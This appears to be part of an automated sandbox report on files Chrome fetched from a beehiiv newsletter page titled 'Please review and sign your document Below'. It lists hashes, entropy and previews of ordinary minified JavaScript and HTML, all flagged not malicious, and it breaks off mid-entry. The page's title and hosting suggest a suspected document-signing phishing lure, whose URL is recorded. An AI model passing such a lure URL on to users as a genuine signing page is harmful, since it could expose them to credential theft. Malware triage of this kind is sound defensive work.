                                                                                                                                            Entropy (8bit):5.498805342299067
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:UgDGH4LOaOvCaBfuSVqNwE9GYaQD6GG4Fu4ZeZF9px+NDV3iFysTL:UgqHHVvCaRuSVqNJ9Dg4ceeZXD+NDVS5
                                                                                                                                            MD5:08BFB65AB7A43999D670A78A687AA945
                                                                                                                                            SHA1:A9F05DB826CF5B99A322CB6CE1FE2A60B0516928
                                                                                                                                            SHA-256:4CE155C3BE538398CA458963D52CABB01AEB6DC79461BEE31992E0F79361050E
                                                                                                                                            SHA-512:8119BC7197201775C8F126AD3B07C26799E32DAFE8001D4B5707F1FF8F748F45A8B49DFA7BD27E9EA17F4BF14C9D490E264CFA020EDFE1F84494CABCC8865DE7
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="f446eac6-05c3-5926-bb4a-1ef48e062217")}catch(e){}}();.import{r as t}from"./index-D6da9p6-.js";const s=640,o=()=>{const[e,i]=t.useState(!1);return t.useEffect(()=>{window.innerWidth<=s&&i(!0)},[]),t.useEffect(()=>{const n=()=>{window.innerWidth<=s&&!e?i(!0):window.innerWidth>s&&e&&i(!1)};return window.addEventListener("resize",n),()=>{window.removeEventListener("resize",n)}},[e]),e};export{o as u};.//# sourceMappingURL=useIsMobile-onEuuMFV.js.map..//# debugId=f446eac6-05c3-5926-bb4a-1ef48e062217.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 908206
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):229194
                                                                                                                                            Entropy (8bit):7.998477099778484
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:6144:LuN7ytq4Db6vYr+3KXdJiGYryDq6jVwfwa+afI:LQ7ytq4Db6UOD6Rawa+AI
                                                                                                                                            MD5:E00D81F011CD1C10B3A31D9B813180A7
                                                                                                                                            SHA1:3E77B8C16066EAF5D5ECE664420EC617958D09A8
                                                                                                                                            SHA-256:8638DF62E84B5BDEA091FB9A3FF5045A02D9B1B06902FAA9BC96C74F7BEA0A82
                                                                                                                                            SHA-512:189358D23613D8A2043132FD9169C73965F6EEA20B0F22BC6F81A7B5440ECBCDA6BD7C62E879548A553BBCF26BE159D9E0275A49EAAE9EF39F40D1E7CFC277AE
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:...........iw.8.(.....n....dg...M....l.'.N.}}h...H....8.....+E9.g.g.{&...A.K..T.j..........r#.Fy1K.4.6.S.@V)..:...QrV..S..?......^..../...o....E6....<)6..D&...4........*.j-...j.Z=....`...n(..j0I...<.....\..fG..s.^..(YL.7E>..O..W...e..V....\......E>;(..X..|7K.....e:Pq.8.L.:.....U^.'.,L..b...*.!....$..u...G<..<).w...o..j...1.dxU.jQd.E;-_.Y.Y.$...n...:_N..6 .ER.....BfC.._..t...&O.p.._.}........JdQ]...Yy}..|.....G...|Z.a.......1rJ...z$.:.L]O..y^Tel@(.B..*..-D.l...4..e.yQ..(..^...o..xk.?...%.M....om.I.....I..!/.{...,4..A....d.....Q.f$.moO...89...... =>..+...J..f..nmM!.....0..Y.....u&..%t`0...%.SXR-.bo..}oA...M.W..t~+...I..j....h..,....m.T.J.e..RB...^..b.u.ql.7u..y_.-2..li......`.`K+..1h.2...S....F.:.....M....*t....B.".;u.u.T.g.t...*.@..[-.Q.{......b..P..<...TL..2...K%.e6p:....]S.`Q..S..G..].#Ur..v#x...OBUl...M.N.i.....Tv....8k,2M.^."..ec..i>..Z...a..a.8...{_\4.,d9.33k...y...+U..vU..u..]N.# ~..bk+[L...$.)UlO.^y..^.;...<R...a..?..g.?..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (65402)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):154762
                                                                                                                                            Entropy (8bit):5.668960014350257
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:udEPwpylafJVim3cBdB9O4QW5ClX97hufBNhTHdJHNdm5oa:udEhlafWm3cdhClNKPzd1Ndmx
                                                                                                                                            MD5:03224CA324C68481225C2EC46CFA8657
                                                                                                                                            SHA1:974C884B1F194F8938C8BA141326438FE5206DDB
                                                                                                                                            SHA-256:DED3124D519A7CBCBB81ECF042C9E3CF398DEF2C1550287BBAF91C63806873A6
                                                                                                                                            SHA-512:9E93751690253D92737B4E253E19226C14D1F86CCB38CE2A1FC3C8AC990ACD36890948D97843EE2281F6385E18C4EC72452945C64C8037472FE7CBE6CE0D50DD
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:// @license Copyright (C) 2014-2025 PerimeterX, Inc (www.perimeterx.com). Content of this file can not be copied and/or distributed..try{window._pxAppId="PXzC5j78di",function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){(null==e||e>t.length)&&(e=t.length);for(var n=0,r=new Array(e);n<e;n++)r[n]=t[n];return r}function n(t,n){if(t){if("string"==typeof t)return e(t,n);var r=Object.prototype.toString.call(t).slice(8,-1);return"Object"===r&&t.constructor&&(r=t.constructor.name),"Map"===r||"Set"===r?Array.from(t):"Arguments"===r||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(r)?e(t,n):void 0}}function r(t){return function(t){if(Array.isArray(t))return e(t)}(t)||function(t){if("undefined"!=typeof Symbol&&null!=t[Symbol.iterator]||null!=t["@@iterator"])return Array.from(t)}(t)||
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (574)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):933
                                                                                                                                            Entropy (8bit):5.49963112387479
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuSIjNHec3/C5+vjZN1iYF+hO2P/T5I66aX5Z8AF6m:JWkE0jN+cvN0w+pP/T5IraXT8AF6m
                                                                                                                                            MD5:2CD767AF2062FD0FAAD9E1E172D99EEA
                                                                                                                                            SHA1:2F78631992C4FEDF7E3FEE0326BAB64E3C7B87BA
                                                                                                                                            SHA-256:DA68D7C47C7D3AB4E1CEAD74EE42915A222C8CD716FBD841E2B7C99AA3D64313
                                                                                                                                            SHA-512:EA4D35737346687AFF0F8E5B3AFBEC1B9D41F2B1AA5375A665A91533F243844EC1DC94010601A96B6D2B917944EE22B8FBCE4E4BAA68D0A76AD09029F1291296
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="7e2b474c-6bb0-5047-9c77-f6efb75892c1")}catch(e){}}();.import{U as n,C as a}from"./keyboard-CaEu2o0u.js";let l="div";var p=(e=>(e[e.None=1]="None",e[e.Focusable=2]="Focusable",e[e.Hidden=4]="Hidden",e))(p||{});function s(e,o){var d;let{features:i=1,...r}=e,t={ref:o,"aria-hidden":(i&2)===2?!0:(d=r["aria-hidden"])!=null?d:void 0,style:{position:"fixed",top:1,left:1,width:1,height:0,padding:0,margin:-1,overflow:"hidden",clip:"rect(0, 0, 0, 0)",whiteSpace:"nowrap",borderWidth:"0",...(i&4)===4&&(i&2)!==2&&{display:"none"}}};return a({ourProps:t,theirProps:r,slot:{},defaultTag:l,name:"Hidden"})}let h=n(s);export{h as f,p as s};.//# sourceMappingURL=hidden-KuoXmiN5.js.map..//# debugId=7e2b474c-6bb0-5047-9c77-f6efb75892c1.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (2133)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2491
                                                                                                                                            Entropy (8bit):5.326876214965847
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkEtWNGVpjp9lnwPqxtW3j9R3iSwwPlzSM5UepuMvI+edNH:QZp6iT2h4aleepJADdV
                                                                                                                                            MD5:D87E0A2E38F37F45013F1A5D35DB6E80
                                                                                                                                            SHA1:A7DE7325FA88C7A0292F792681D025A0CC0E639F
                                                                                                                                            SHA-256:CE008F40F1E53226463657118FFCF72A388E74E412702D23F7BC822E62AB71CA
                                                                                                                                            SHA-512:835D8C39DE5753144D5941BAC4E0E9260E6164C74FF0502595AA83EE8AE9358F1ABFC2A3D66BE6FA83F5506EFC7A1F59DC7F658DB1C73C0E68A9F50456B0D654
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="8485e214-aa2f-5b59-b47e-c780d8fa0326")}catch(e){}}();.import{j as d}from"./jsx-runtime-BjG_zV1W.js";import{r as i}from"./index-D6da9p6-.js";import{T as m}from"./index-BdpAPpdN.js";import{c as h}from"./components-Oj2xMfGE.js";const f=i.createContext(null),c={didCatch:!1,error:null};class p extends i.Component{constructor(r){super(r),this.resetErrorBoundary=this.resetErrorBoundary.bind(this),this.state=c}static getDerivedStateFromError(r){return{didCatch:!0,error:r}}resetErrorBoundary(){const{error:r}=this.state;if(r!==null){for(var n,t,o=arguments.length,a=new Array(o),s=0;s<o;s++)a[s]=arguments[s];(n=(t=this.props).onReset)===null||n===void 0||n.call(t,{args:a,reason:"imperative-api"}),this.setState(c)}}componentDidCatch(r,n){var t,o;(t=(o=this.props).onError)===null||t===void 0|
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1346)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1711
                                                                                                                                            Entropy (8bit):5.4356839471371705
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkE1szNEYh/4Z2+IN0OB6rAzoGP4KQ9zLs2:QrYhAZ2+wn2AzVP4Pzd
                                                                                                                                            MD5:417B56AF92EB5204A8AC45476F9A6904
                                                                                                                                            SHA1:70A34B9B2D87CD56C30BCDA8508E75D788B75555
                                                                                                                                            SHA-256:6CF35132CF46638A07D3212A8EC7033DE81A828CFB6E1C49E6D7765620D66A68
                                                                                                                                            SHA-512:3E9B437C307277F0D10D97BB8DB96ECA2625E120272B15A0E9F445D8BE9ED5021A0BDE7DE8FE9A71F9B0203FAC93201B5EB78D993F6EF8F5BD7DD00FCB30AC50
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="ff96dcd1-9738-5b63-88c1-9cbb061aef52")}catch(e){}}();.import{c as j,g as B}from"./index-D6da9p6-.js";var b={exports:{}};(function(w,N){(function(a,f){w.exports=f()})(j,function(){return function(a,f,u){a=a||{};var e=f.prototype,y={future:"in %s",past:"%s ago",s:"a few seconds",m:"a minute",mm:"%d minutes",h:"an hour",hh:"%d hours",d:"a day",dd:"%d days",M:"a month",MM:"%d months",y:"a year",yy:"%d years"};function x(r,t,i,m){return e.fromToBase(r,t,i,m)}u.en.relativeTime=y,e.fromToBase=function(r,t,i,m,g){for(var l,d,h,c=i.$locale().relativeTime||y,v=a.thresholds||[{l:"s",r:44,d:"second"},{l:"m",r:89},{l:"mm",r:44,d:"minute"},{l:"h",r:89},{l:"hh",r:21,d:"hour"},{l:"d",r:35},{l:"dd",r:25,d:"day"},{l:"M",r:45},{l:"MM",r:10,d:"month"},{l:"y",r:17},{l:"yy",d:"year"}],$=v.length,s=0;s
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1465)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1830
                                                                                                                                            Entropy (8bit):5.45957708866139
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkEUuNvVmZSPXkVn719ndh8kH0ynVvfHPngBsmMOca53cJ:QMsVm0PU9197jH0ynhvgLyJ
                                                                                                                                            MD5:7A2375960B4DCBF4F214C99F81173369
                                                                                                                                            SHA1:EE2B4429330C400C90D95C4E1EB6473168F5F921
                                                                                                                                            SHA-256:34EBE5A84FF32DFE681819C8DF6E4C38DA65FB799543BA6CA7104737853BAB78
                                                                                                                                            SHA-512:DACB85E86D2A4B575FD3D3344D2AF9C66D9546F3AF05595B79E6A746B569BB48D83F563534183FC23708888EAE4D56361D36180DA181E8A26C8EA3EEE88DA90F
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/HeroChatIcon-DZxH_rr3.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="2842b501-6f6d-5180-bc66-feb3a70b1d2e")}catch(e){}}();.import{r as e}from"./index-D6da9p6-.js";import{j as t}from"./jsx-runtime-BjG_zV1W.js";import{c as a}from"./index-x2da_zcv.js";function c({title:r,titleId:o,...n},s){return e.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24",strokeWidth:1.5,stroke:"currentColor","aria-hidden":"true","data-slot":"icon",ref:s,"aria-labelledby":o},n),r?e.createElement("title",{id:o},r):null,e.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"M21 8.25c0-2.485-2.099-4.5-4.688-4.5-1.935 0-3.597 1.126-4.312 2.733-.715-1.607-2.377-2.733-4.313-2.733C5.1 3.75 3 5.765 3 8.25c0 7.22 9 12 9 12s9-4.78 9-12Z"}))}const d=e.forwardRef(c),w=({className:r})=>t.jsx("svg",{xmlns:"http://www.w3.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (500)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):868
                                                                                                                                            Entropy (8bit):5.480803011445892
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuSLuR1ONuDCT7/ZQXfdpBeRluR1v:JWkE3uyNuDCTeXrBIluj
                                                                                                                                            MD5:7BA41B2464D6B104C13BC76CBD2B2745
                                                                                                                                            SHA1:D276E8D91A54464A9FBB0F831C8B245E40D3DA3A
                                                                                                                                            SHA-256:75B89DFE7FA07FDCE28C642398F9B9FDA667C6AA6EF0A4F72DB9A2B61B6B2DF2
                                                                                                                                            SHA-512:BD65A734093F2ACAF4E5ABC65F093C767918CDC0952096E8314E9275B3CF9902CC8A3B709B6EB8B17D380DA96DB97D3617AC37B2D8E1FFF1252A2857EC606171
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/use-tree-walker-Inv4mdsP.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="51343ced-e1d9-5356-bd0e-6589a5b05c5a")}catch(e){}}();.import{r as c}from"./index-D6da9p6-.js";import{o as d}from"./use-is-mounted-BaHv16bB.js";import{l as m}from"./keyboard-CaEu2o0u.js";function b({container:e,accept:r,walk:t,enabled:f=!0}){let o=c.useRef(r),n=c.useRef(t);c.useEffect(()=>{o.current=r,n.current=t},[r,t]),m(()=>{if(!e||!f)return;let u=d(e);if(!u)return;let a=o.current,l=n.current,p=Object.assign(s=>a(s),{acceptNode:a}),i=u.createTreeWalker(e,NodeFilter.SHOW_ELEMENT,p,!1);for(;i.nextNode();)l(i.currentNode)},[e,f,o,n])}export{b as F};.//# sourceMappingURL=use-tree-walker-Inv4mdsP.js.map..//# debugId=51343ced-e1d9-5356-bd0e-6589a5b05c5a.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (10369)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10731
                                                                                                                                            Entropy (8bit):5.390992725177293
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:J4aO2F5ohy+hk81B1h151rbXYBzaxU6ctyqmyFY1Ob8:J46+hksLrD4BzAjyFB8
                                                                                                                                            MD5:C02F648F177E518C48A22DB5298A1A2D
                                                                                                                                            SHA1:96FE17BDAB414CF8AF06CB7A0D8D118F8361BD3D
                                                                                                                                            SHA-256:0853BE823EDCC27DF0573B5ED5B4561A6EC0E5061841ADF47F82EC3099FE98EB
                                                                                                                                            SHA-512:0557607E2A4628C7091CEB8705A51D54DA04B1A6CD48F52B01AF693D3B3D700BC206984FE4FD2742775BB10357203077B78D23F68D890495ED9416579116E9CA
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="cf862631-32ee-5fef-9f35-5adf32293ff4")}catch(e){}}();.import{r as c,e as N}from"./index-D6da9p6-.js";import{p as q,r as H}from"./bugs-DVQzBh-s.js";import{o as v,O as U,U as P,y as w,u as V,C as E,I as L,a as f,T as X,b as A,l as $}from"./keyboard-CaEu2o0u.js";import{y as J,s as W,d as F,n as Y,u as Z}from"./transition-y-5XFFuu.js";import{F as z}from"./use-tree-walker-Inv4mdsP.js";import{h as ee,T as te,_ as re,M as Q,D as G,I as ne}from"./use-is-mounted-BaHv16bB.js";function B(e){return[e.screenX,e.screenY]}function ae(){let e=c.useRef([-1,-1]);return{wasMoved(a){let r=B(a);return e.current[0]===r[0]&&e.current[1]===r[1]?!1:(e.current=r,!0)},update(a){e.current=B(a)}}}function ue(e){throw new Error("Unexpected object: "+e)}var g=(e=>(e[e.First=0]="First",e[e.Previous=1]="Previous
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (26884)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):106184
                                                                                                                                            Entropy (8bit):5.509294081688565
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:upITkjD4WpwjDz3YLJgYQuRmzVPV86Q6TzVMI86Q62kvLY8QuRmzVP286Q6WYm8X:upIwjDIjDcvlAVxl5xlVlA2xlKxlTx/0
                                                                                                                                            MD5:1B7C93990C4F615262742525E877D17E
                                                                                                                                            SHA1:34F2A0BC68AFD971595DFCFB8864714AF2181EE5
                                                                                                                                            SHA-256:1567285C711A62EC3D994E2337CE94BC1DEE9B3FF2B990656226BED071CE12C8
                                                                                                                                            SHA-512:46C2490EF22DF9F46E31DF7835E35AA6FAE3430E1024058DA13C60A6DF4AC4ED9560846AD23464EEFE07F9B34DE658B5DA192F8977CED0147CAE4B876602C642
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Preview:<!DOCTYPE html><html lang="en" class="h-full antialiased"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/><link rel="preload" as="image" href="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/static_assets/defaults/thumb_logo.png"/><script src="https://beehiiv-adnetwork-production.s3.amazonaws.com/pixel-js.js" async=""></script><meta name="mobile-web-app-capable" content="yes"/><meta name="apple-mobile-web-app-capable" content="yes"/><meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"/><meta name="theme-color" content="#000000"/><title>Please review and sign your document Below</title><meta content="" name="keywords"/><meta name="author"/><meta content="Date 19/012025" name="description"/><meta content="website" property="og:type"/><meta content="https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below" property="og
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (614)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1149
                                                                                                                                            Entropy (8bit):5.409419982652436
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuSPCwNq7ENl1cQm4dyszpWQeBAf2uc3cCx:JWkE+wNqc3umV1WRvf3nx
                                                                                                                                            MD5:CB4B02FADE761331CD0F6917B26ECE45
                                                                                                                                            SHA1:3A9AC3DA54ED58281E75A0EFE3BC95C621EA2153
                                                                                                                                            SHA-256:4589197DFD4D616103A75C0DD5E557B315DC018BD5164FFF60F21767F9936718
                                                                                                                                            SHA-512:E742A86D084576230F5A9C5BCC3E475F41B875F44F9DA002DB101E93EF6A144663A640FBDEFB8B0C311C29A2610A486EC07C4094D9DD14CFD42F9B47981A36D1
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/index-x2da_zcv.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="d95ed293-e5f4-591e-9d87-7da711cb696c")}catch(e){}}();.import{g as c}from"./index-D6da9p6-.js";var i={exports:{}};/*!..Copyright (c) 2018 Jed Watson...Licensed under the MIT License (MIT), see..http://jedwatson.github.io/classnames.*/(function(e){(function(){var f={}.hasOwnProperty;function s(){for(var t="",r=0;r<arguments.length;r++){var n=arguments[r];n&&(t=o(t,a(n)))}return t}function a(t){if(typeof t=="string"||typeof t=="number")return t;if(typeof t!="object")return"";if(Array.isArray(t))return s.apply(null,t);if(t.toString!==Object.prototype.toString&&!t.toString.toString().includes("[native code]"))return t.toString();var r="";for(var n in t)f.call(t,n)&&t[n]&&(r=o(r,n));return r}function o(t,r){return r?t?t+" "+r:t+r:t}e.exports?(s.default=s,e.exports=s):window.classNames=
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (490)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):856
                                                                                                                                            Entropy (8bit):5.479713299845736
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuSmJsEN2f6nXkVn71oi7IyhntbCLKJsF:JWkEgZNAsXkVn71fnRI48
                                                                                                                                            MD5:CB9D47ADDD2FE68A1507010A85344056
                                                                                                                                            SHA1:5CEDD458C9387C2DCD45EA599FAE79BE47976382
                                                                                                                                            SHA-256:F464D8B1F4571DBB24387884D470DB3FC615829AD1BDC77919A837B9E70474FD
                                                                                                                                            SHA-512:D38CE1973256A333DB66800B3F47896207615F6B048F80C9E35FFE9385282287505F69BA51D5D9B1DEE7AF5708899D0617F5EAF2D6E91BA69D5F9FBF6C5335BD
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="45f8a0fe-5f08-519a-bd11-79d091244824")}catch(e){}}();.import{r as e}from"./index-D6da9p6-.js";function a({title:r,titleId:t,...o},n){return e.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24",strokeWidth:1.5,stroke:"currentColor","aria-hidden":"true","data-slot":"icon",ref:n,"aria-labelledby":t},o),r?e.createElement("title",{id:t},r):null,e.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"M10.5 19.5 3 12m0 0 7.5-7.5M3 12h18"}))}const i=e.forwardRef(a);export{i as F};.//# sourceMappingURL=ArrowLeftIcon-Dz9QYxn0.js.map..//# debugId=45f8a0fe-5f08-519a-bd11-79d091244824.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1600)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1971
                                                                                                                                            Entropy (8bit):5.472641443168121
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkE1N5a04qWXBZd+kRPt79o8sRYX4x1aSnFvENBJQjfQ:Qc0hGPPP7zsRYox1fFdQ
                                                                                                                                            MD5:0B716D4AD7EF31CAA9D7F2630AEC0799
                                                                                                                                            SHA1:C9B045705D442675374FEDFD2AACA00E41F2F990
                                                                                                                                            SHA-256:2028371835BD542CF5899A8A10EE2E234B8C745D5F4C491E3B1FE0EA9F5725C1
                                                                                                                                            SHA-512:25EA92393250F523D7D65772FCCB22FA1AC730902D03927FF44EC8D9D990AAA07B5FEBE72E7DB9F6AD8237FAAA05A709614604B422DE5E2ECC16BCEFBD61825D
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="f527bf8a-8d5a-561c-8da5-5db1f8fdccf7")}catch(e){}}();.import{u as _,a as P,r as x}from"./index-D6da9p6-.js";import{L as u}from"./PageProvider-uKxoiNdl.js";import{u as w}from"./components-Oj2xMfGE.js";const C=f=>{const t=_(),S=P(),[e,g]=x.useState(),[R]=w(),h=e?e?.redirects?.length:0,E=(e?e?.currentIndex+1:0)/h*100,r=()=>{localStorage.removeItem(u.SIGNUP_REDIRECTS)};return x.useEffect(()=>{const s=localStorage.getItem(u.SIGNUP_REDIRECTS);if(s){const c=JSON.parse(s).startedAt,n=new Date(c).getTime(),i=new Date().getTime()-n,d=1e3*60*3;i>d?r():g(JSON.parse(s))}else e&&g(void 0)},[S]),x.useEffect(()=>{if(e){const s=e.redirects.map(a=>a.href),p=S.pathname,c=!s.includes(p),n=R.get("recommendations")==="true";c&&!n&&(r(),g(void 0))}},[e]),{currentStep:e?.redirects?.[e?.currentIndex],nex
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (8954)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):9331
                                                                                                                                            Entropy (8bit):5.413016811582397
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:OJftH7dkI/KxO27f4sWziTK/OHOhqOwNMD7nM1sWzfwY4o:wtHhR/IzjTK2HOhtwNMD7nMnwY4o
                                                                                                                                            MD5:F181F6A00E8129C57154F579F3E5BC7E
                                                                                                                                            SHA1:F131D63A42EDA0ABF5B3826503AAF927A7AE9867
                                                                                                                                            SHA-256:90ED6822E113996411DFD42BA2DD0178DCD46BE1C84EC1E1EDE1C563B5A1C4D4
                                                                                                                                            SHA-512:B4BF9DB3D244B474D59D8B2E78AAD88FB909C7CC09F11146C9D4490DD4E0200D61BD960E9DC13A642C85FEF50B1B8A2E9C2BAC0AA204D8C187573D833E04F58F
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="5728b016-604d-5b0b-93aa-534141abd4fa")}catch(e){}}();.import{r as d,a as N,u as k}from"./index-D6da9p6-.js";import{j as e}from"./jsx-runtime-BjG_zV1W.js";import{_ as F}from"./index-CqJN8iQq.js";import{u as $}from"./useIsLoggedIn-BbU3-q43.js";import{u as S}from"./useToast-DK42uF07.js";import{c as L,L as w,u as j}from"./components-Oj2xMfGE.js";import{u as b}from"./useTranslation-CfKJAmGY.js";import{L as T}from"./LoginWithPasswordAction-TVLpJaLq.js";import{T as f}from"./index-BdpAPpdN.js";import{I as M}from"./Image-ycA_AFLr.js";import{_ as g}from"./dialog-CtpHvvfD.js";import{F as v}from"./XMarkIcon-BIfmjQfr.js";import{q as x}from"./transition-y-5XFFuu.js";const P=s=>/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(s),z=({allowSignup:s=!0,onSuccess:r})=>{const[a,t]=d.useState(""),n=$(),o=L(),m=o.da
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (17968)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):84340
                                                                                                                                            Entropy (8bit):5.2905589892461675
                                                                                                                                            Encrypted:false
